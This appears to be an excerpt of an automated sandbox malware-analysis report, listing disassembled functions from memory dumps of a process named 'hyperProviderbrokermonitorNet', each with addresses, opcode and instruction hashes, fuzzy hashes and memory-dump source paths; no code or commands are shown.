
Similarity

API ID:
String ID:
API String ID:
Opcode ID: c181caf53bce5b96ea9437a04280436fb9fd857e8191feeee28794a09c38c090
Instruction ID: 4292dd399eb09fac0f62555cd6e6575fcf7bbed3c588fdc995459250efe92b28
Opcode Fuzzy Hash: c181caf53bce5b96ea9437a04280436fb9fd857e8191feeee28794a09c38c090
Instruction Fuzzy Hash: 15215731E1896D9FDB94DB58C8A09EDBBB1FF49314F20017ED10AE72A1DA2CA801DB40

Function 00007FFD34A6A680 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4083308e721f656c97465d6a753dffb98db7c22ed67f0da02fcbedaceba3def
Instruction ID: 7f32ef45c683f6ffe35ff8aaeec093097036f8e8c4e962aea193557b249ba82b
Opcode Fuzzy Hash: d4083308e721f656c97465d6a753dffb98db7c22ed67f0da02fcbedaceba3def
Instruction Fuzzy Hash: 49313910B1C5E74BE72A821845B46747BA1EF83325B2886BAD18BCB4D7D82CB881E341

Function 00007FFD34A6CAA2 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c5779c7be261c15fa69b7e4cb813e02d50d41466d0700c6d74be7b793cc430
Instruction ID: 9e95e39d108f91ac713e71041c5eab0103cd4f5b89f386745a845431f98e0ff1
Opcode Fuzzy Hash: 47c5779c7be261c15fa69b7e4cb813e02d50d41466d0700c6d74be7b793cc430
Instruction Fuzzy Hash: 4A312871E0891D8FDF98DB58C4A5AEDB7B1FF6D314F5001AED04EE7291CA39A9418B40

Function 00007FFD34A67B02 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93518c95b9b5bde20f66b78afa6600b18acc2bf11c37d944ac74bdc2aacbb646
Instruction ID: 2742a7c0aa3fe3df34350e9c12a69f3c33cbbee2d19468bb72a7303b6b0f6dbd
Opcode Fuzzy Hash: 93518c95b9b5bde20f66b78afa6600b18acc2bf11c37d944ac74bdc2aacbb646
Instruction Fuzzy Hash: 03314935E1891D8FCF98DB18C4A5AECB7B1FF69315F1001AED00EE3291CE39A9818B40

Function 00007FFD34A62432 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5f456ec6a15cb8ec669b3e9d18293653740ab8066dcb3f4224614da853feeb
Instruction ID: 8fe15086b83c0560e9e1cae3e6e0ff53193549d95646d23a201b92efc13f3969
Opcode Fuzzy Hash: 6b5f456ec6a15cb8ec669b3e9d18293653740ab8066dcb3f4224614da853feeb
Instruction Fuzzy Hash: C521F731A0891D8FDF98EB58C4A5AEDB3B1FF68314F1041AED44EE3291CA39A941CB40

Function 00007FFD34A62F13 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc7b078bf55dc79e1a333bff1bca88d6af26c8401724aade6a5e290a54db7b1
Instruction ID: 53fc7fabad887c60a902ccb0df5571f898ab35fd42c426b4e28fddcfa6d04c7c
Opcode Fuzzy Hash: efc7b078bf55dc79e1a333bff1bca88d6af26c8401724aade6a5e290a54db7b1
Instruction Fuzzy Hash: 7A219532F185098FEB98EB58D8A557877E1FF8A326F15017ED14FC3591CA2D6C428B40

Function 00007FFD34660C25 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397c8d6ed6c6761931bf294e4bc660808c917e9c48e0d778ad482df686144d58
Instruction ID: dab57e68c8d81e218b7c73ac2e9d034cae1bcfb87d411c82f1466fa9a6a9c8ad
Opcode Fuzzy Hash: 397c8d6ed6c6761931bf294e4bc660808c917e9c48e0d778ad482df686144d58
Instruction Fuzzy Hash: 84210171B0DA998FE712DF68C8A92ED7FA0EF42324F1541BAC244CB1C2DA3C25499781

Function 00007FFD34A68BE4 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebbe1aea1528cea963b560990941591ea778ae0578bb49edcf20859b6edd923c
Instruction ID: d0cc3f1294debde83a8e736280f412a6f4ac748d204a27fc4300332bf8a5802a
Opcode Fuzzy Hash: ebbe1aea1528cea963b560990941591ea778ae0578bb49edcf20859b6edd923c
Instruction Fuzzy Hash: 5811D572F0E9494FD799A76898A12E8B7E4FF96324F14017ED14EC7283DE2C68469700

Function 00007FFD34664DAF Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d6aa1bce164e221b7d634180a59f15519f93cd7d18572af0e0b056d6a2596f
Instruction ID: db534bbe538d34b311c827ab6f84eac1d0bd1482ea932f9401eb2f41df54f312
Opcode Fuzzy Hash: 92d6aa1bce164e221b7d634180a59f15519f93cd7d18572af0e0b056d6a2596f
Instruction Fuzzy Hash: 18210331F0892A4FEB94EF14C5A47F863E2AF96320F1141B6D64ED71A2DE3C6D819704

Function 00007FFD34A6DBF4 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a764e7951f154c04ab13cedf44e58cd7d2e1361916cbd14346382bdc833304b2
Instruction ID: 7bc9af1b43bc6bcd3eda18fc0f409c3f562d1c17fb0c9bd2d6f83bed9fe6ca8d
Opcode Fuzzy Hash: a764e7951f154c04ab13cedf44e58cd7d2e1361916cbd14346382bdc833304b2
Instruction Fuzzy Hash: 20110631F0D9498FDB88E7A894A26E8B7E0FF56328F10017AD14ED72C3DE6D68429340

Function 00007FFD34A62F77 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96417b8b8c0150c2cbd473d20b4a6b28a88dd50f47295df4843f0ae9a62e74fc
Instruction ID: 6a5fe4ce871231e4a5561156b830e405b6eff88c05f26f7f275190ff0ddc5cd9
Opcode Fuzzy Hash: 96417b8b8c0150c2cbd473d20b4a6b28a88dd50f47295df4843f0ae9a62e74fc
Instruction Fuzzy Hash: FA115E31708A188FDB98DB5CE895AA9B3F2FF89315B1101AAD04ED7662CA35AC418B40

Function 00007FFD34A633D9 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9477d3968dcb596b762804b6f31df807c3765e87c543f539b7c7776e55521913
Instruction ID: 2a6063d5b83720fb24239b5651d7b1e994b04195f477cea3275e8d2bf8239b2c
Opcode Fuzzy Hash: 9477d3968dcb596b762804b6f31df807c3765e87c543f539b7c7776e55521913
Instruction Fuzzy Hash: 52115731B0E68A1FE76156A848E81FA7BA4DF47320F150077E149D7292CD6C6C4793A1

Function 00007FFD34A6A6B0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4e1ea10ad8963bd2812037c9ca846198a9078015f94e590c27f058557ee449
Instruction ID: 44c6f6794a7e35f2f6bad71a685f5a13d27696e5d996db9ddd7fa65639a310bb
Opcode Fuzzy Hash: cb4e1ea10ad8963bd2812037c9ca846198a9078015f94e590c27f058557ee449
Instruction Fuzzy Hash: 7111E710F1C46786E63C820881B46B572A1FF93329B348A76D14FCB4DAD82CB980B380

Function 00007FFD34A65040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1c84896cc2cf52b28155974fc03e808f6fbd9185c0fdd2924083d291fc4c8d
Instruction ID: 020853ee5fa6188997cd062c8298d63aaf3a51c1a861e16185f8da5223a10da6
Opcode Fuzzy Hash: 2e1c84896cc2cf52b28155974fc03e808f6fbd9185c0fdd2924083d291fc4c8d
Instruction Fuzzy Hash: C911DD10A2C4678EF668CA4CA4F49B87391FF513157354679D55FCB586C92CF881E7C0

Function 00007FFD34A62F1C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a11659b3ebb0f995b3348d06b2e0a3e1891493a5e46ebce4ff4c50486a59e1
Instruction ID: d8c0b41ac38c955fd9e3b3851cd9a89a500e1013cc13f06484f2df892655e4be
Opcode Fuzzy Hash: 63a11659b3ebb0f995b3348d06b2e0a3e1891493a5e46ebce4ff4c50486a59e1
Instruction Fuzzy Hash: 9E118631B096098FE758DB58D8A56B9B3E1FF4A315B10017FD14FD36A2CA296C418B00

Function 00007FFD34A640C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67df02f2812359bd8d0a7be8abddd05b1b3ab345e624ca413a9d6c0215175fac
Instruction ID: d19e6b8778c740e52ef7b246f46c24b9db1b8ed75d5e5725d5c5114a8055d734
Opcode Fuzzy Hash: 67df02f2812359bd8d0a7be8abddd05b1b3ab345e624ca413a9d6c0215175fac
Instruction Fuzzy Hash: 7611E331B09A198EDB64EF6481A15FA73A1EF95315F40053BD54EC35C2CE2CB8459750

Function 00007FFD34A66816 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b516d0162b69ac84c18de8c39816119145d5bbf4a5cc3ce78e84d777a65de6
Instruction ID: e04ef7b163bfd5ac89b53a3230ab3b86396332c8af0f0021c7e92b8ed2c6c1a2
Opcode Fuzzy Hash: e2b516d0162b69ac84c18de8c39816119145d5bbf4a5cc3ce78e84d777a65de6
Instruction Fuzzy Hash: 3A012431A8E7C84FDB429B788C614E87FE0DF4B22471A01FAD08DCB4B2CA0D9846C712

Function 00007FFD34A63F3E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138ee5ba96dd8383ab2a7d24ac976309bef9dd6e28c2846afc8fe1e87da2b42a
Instruction ID: d2883154f4008aa35b77acf3f82711f4fd883c12995601b207f58af4d6b87db6
Opcode Fuzzy Hash: 138ee5ba96dd8383ab2a7d24ac976309bef9dd6e28c2846afc8fe1e87da2b42a
Instruction Fuzzy Hash: C0112B3170A50A8FE7199E58D4B52E533A4EF96366F21013BD61AC76C1CB3D68918750

Function 00007FFD34A695AE Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da083067e84b45962763829a333d63f229f653e69d5db3075222305398cc1ffe
Instruction ID: 727a3330bbf0b230e43599355346e70ba27cb6a62341c8e17ea58985f0ca6117
Opcode Fuzzy Hash: da083067e84b45962763829a333d63f229f653e69d5db3075222305398cc1ffe
Instruction Fuzzy Hash: 54112B3130950A8FE7199E58D4B42E573A4EF96365F10013BDA0EC76C1CB3DA851C750

Function 00007FFD34664D2C Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595504bdda663b4277ac61532006821c4b9b2e973ae3fb973abad89aac589eef
Instruction ID: e62f703479e1b20e098cf661e4f728d0a5bb745ff1d1b2843e0cf6689ddd9f0a
Opcode Fuzzy Hash: 595504bdda663b4277ac61532006821c4b9b2e973ae3fb973abad89aac589eef
Instruction Fuzzy Hash: BA115E31F0892A5BEBA5EF18C8B47FC22A2AF56320F5501B6D50DD72A2DE2C6D805744

Function 00007FFD34A66838 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3234ebf3d4d81c3f0a4b8627de1744209f63ca2ea240fc4620458c8dfec0929b
Instruction ID: 8a3c675119c855ceb9e27a4702232eaab7e8064b1fab75fdf04e2ff814fb0748
Opcode Fuzzy Hash: 3234ebf3d4d81c3f0a4b8627de1744209f63ca2ea240fc4620458c8dfec0929b
Instruction Fuzzy Hash: 23012661A4D6C84FDB509B7888629D87FE0EF4B22070602EAD04DC74A2CA1D98468742

Function 00007FFD34A635A9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4238c1772755e9a14a1fbc0b79f95056df7c42712732f7ed2d929be4c8fd004b
Instruction ID: ec32f3f7c5d4dec7194de450c24e6219cce07f8566fdf2107ac6d3ea4eb287a8
Opcode Fuzzy Hash: 4238c1772755e9a14a1fbc0b79f95056df7c42712732f7ed2d929be4c8fd004b
Instruction Fuzzy Hash: 3F019271F099584FEB49FBA898A11EC77B0EF4A324B14007AD14AD3283CE2C68428740

Function 00007FFD34A6C390 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26659af70c93ff74a3ac0bc456c33f1ba1f29279b681178cb6d1667cea087c71
Instruction ID: 5f89a9ffd8598a8d08bccbba791f20d6d3b3b0248c535f838f42d493507f5258
Opcode Fuzzy Hash: 26659af70c93ff74a3ac0bc456c33f1ba1f29279b681178cb6d1667cea087c71
Instruction Fuzzy Hash: 7EF0C83170C9084FE76CEA2C64262F973D1EF89222B10017FE18EC3652CE2998424241

Function 00007FFD34A6688D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2391eb4a695a32e20aa691a0e5ce03a948f7542ae57b541f6ca780e91d35977d
Instruction ID: 62a070d910dda1bca8dd08f19ef4d3994b1c875b3954f712c39691b1035a8b67
Opcode Fuzzy Hash: 2391eb4a695a32e20aa691a0e5ce03a948f7542ae57b541f6ca780e91d35977d
Instruction Fuzzy Hash: 01F0A96548E3C04FD3128B748C669967FE0EF5721470A82EAD089CB8B3C61D8886C702

Function 00007FFD34660C40 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a6ee171376a02f7a5b0e3336cbf1b29dbdcbb98d5fd6c5cee61660a8771cb1
Instruction ID: 71d52862d06090b3eba5863d3a5b3cb498b8f6d07cd86c3806197d0d5df2a834
Opcode Fuzzy Hash: 08a6ee171376a02f7a5b0e3336cbf1b29dbdcbb98d5fd6c5cee61660a8771cb1
Instruction Fuzzy Hash: CD01AD71A0DB988FE702DF68C8A42D9BFB0AF42320F0545FAC280DB192D63C56489780

Function 00007FFD34A67A09 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8160fbc1c333874666f1776e45d7b01e31e62fb446e91e78dbdf4cfda34548a7
Instruction ID: 09c38f89005301298ab8f07df067b797c2686b261021c7be72ed214aa6f84f92
Opcode Fuzzy Hash: 8160fbc1c333874666f1776e45d7b01e31e62fb446e91e78dbdf4cfda34548a7
Instruction Fuzzy Hash: 0A011B7491995D8FDB98DF58C4A4AB8B7B1FF69315F14456EC00DE7291CA396880CF00

Function 00007FFD34660C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3bc47833d86b07e1c1b59f4fcae6f80cd6f8f890e5ad5ed4a6e5d9dee05c139
Instruction ID: 90ea2e905f3d98e19dc12a337f4ca6bcf742d8d74d7c7b6e6b77f4e420b0b662
Opcode Fuzzy Hash: d3bc47833d86b07e1c1b59f4fcae6f80cd6f8f890e5ad5ed4a6e5d9dee05c139
Instruction Fuzzy Hash: 07019E71A0D7888FE702DF64C8941D9BFB0AF43324F1541EAC180DB192D6385648D781

Function 00007FFD34A6CDB2 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91c85b979c792ee1fd572816d203cc0bef3f862c0059e8eec2b119c5944395ef
Instruction ID: a3673bd580b49aa2504bba9a20e02f0178e04b5b7df0bb80ec80714c22a2f04e
Opcode Fuzzy Hash: 91c85b979c792ee1fd572816d203cc0bef3f862c0059e8eec2b119c5944395ef
Instruction Fuzzy Hash: AFF0F63194D2C6DFE3028B7088A15D93FA4FF43224B2800F6D555CB0A2CA2C6A07E751

Function 00007FFD34A67E12 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de74078907e7f721ef60a588414358ce4fb120bb90332c38dd7c0b61c2471337
Instruction ID: 4a4907eb86ee7e45b7615c96cd599e9cce065a5d05c9206c016b8c4b89f91ff5
Opcode Fuzzy Hash: de74078907e7f721ef60a588414358ce4fb120bb90332c38dd7c0b61c2471337
Instruction Fuzzy Hash: D4F0BB3155D3C59FD3039B7088615E57FB4AF43218B1900E7E595CB0A2D62D1A1AD761

Function 00007FFD34A69748 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030fb75581b8e22647107b5acfac62cc307766e40e1cdf0f546bfbc2912b1179
Instruction ID: 979fbb2bd1c1c6fbdc799a2a82d3c11a28f8c56672d3ed4a4a29b0d9566308ba
Opcode Fuzzy Hash: 030fb75581b8e22647107b5acfac62cc307766e40e1cdf0f546bfbc2912b1179
Instruction Fuzzy Hash: A9F0B431B1CA598ED728AF6880715FA72A4FF85325B40063AD58FC35C2CE3CB8069690

Function 00007FFD34A62742 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b9defbdcddb8f96621048295754ab762b0b35fff529912c248a894912706e2
Instruction ID: 2ddebd2efbccd26184a2e71c5ee8e6b2683a82447cbb9a10f4e041ce2a259e9f
Opcode Fuzzy Hash: 40b9defbdcddb8f96621048295754ab762b0b35fff529912c248a894912706e2
Instruction Fuzzy Hash: 71F0903244E3869FD302ABB088A19E67FB4EF43214B1400F6D656C70A2CA6C261AD761

Function 00007FFD34A6CA24 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c04fcd9c6cbd52ac7ff5e2a87f2f4a8a21126c2bf739783e8d4887143bbcdb9
Instruction ID: e8aa807d8b8138670be28ed3992a89062eca78a95407fdeaeb2fb9ad0afa3ca8
Opcode Fuzzy Hash: 1c04fcd9c6cbd52ac7ff5e2a87f2f4a8a21126c2bf739783e8d4887143bbcdb9
Instruction Fuzzy Hash: 38011270A0D96D8EDB98DF1888A57B8B7F1FB69304F5401FAD14DE7282CA386980DF01

Function 00007FFD34662AFB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86aaabb21a06fbef6967472d2a2730c1f57ab56989906881aea21ac119162eea
Instruction ID: 3f0341ffe73d55cf678327df6db2d0c77d984145008bc6911c0a78da296e80bf
Opcode Fuzzy Hash: 86aaabb21a06fbef6967472d2a2730c1f57ab56989906881aea21ac119162eea
Instruction Fuzzy Hash: 76F0EC30648A088FCF58EF08C494DA977F1FBA9311F144559D44AD7260DA79A985CF41

Function 00007FFD34664E05 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7211f2566b1a487dfb3b2bf0d4831ba7c81824aef09c1df1ca22df04f2918252
Instruction ID: 6a9f2b24b92217123dfb5013d176a56921ff28ba4faffec7552aedabcf8893dc
Opcode Fuzzy Hash: 7211f2566b1a487dfb3b2bf0d4831ba7c81824aef09c1df1ca22df04f2918252
Instruction Fuzzy Hash: BEF0E131F4892E8BEB64EF04C9A47F872A1AB96320F5501B6C54DD71A1DE7C69C19B04

Function 00007FFD34A63A3F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c122570424fad2b74aa5e54712868ff4c21daea624d6729e742c06717e681a
Instruction ID: ff39576c125f9779c3c0f239c50bafe5d93e16394f348a096dada7f1b32eb35c
Opcode Fuzzy Hash: 56c122570424fad2b74aa5e54712868ff4c21daea624d6729e742c06717e681a
Instruction Fuzzy Hash: 78F0E95272DA894FD754AF28C4655E5B391FF64218F54467FD08FC71C2CE39B4098741

Function 00007FFD34660C50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
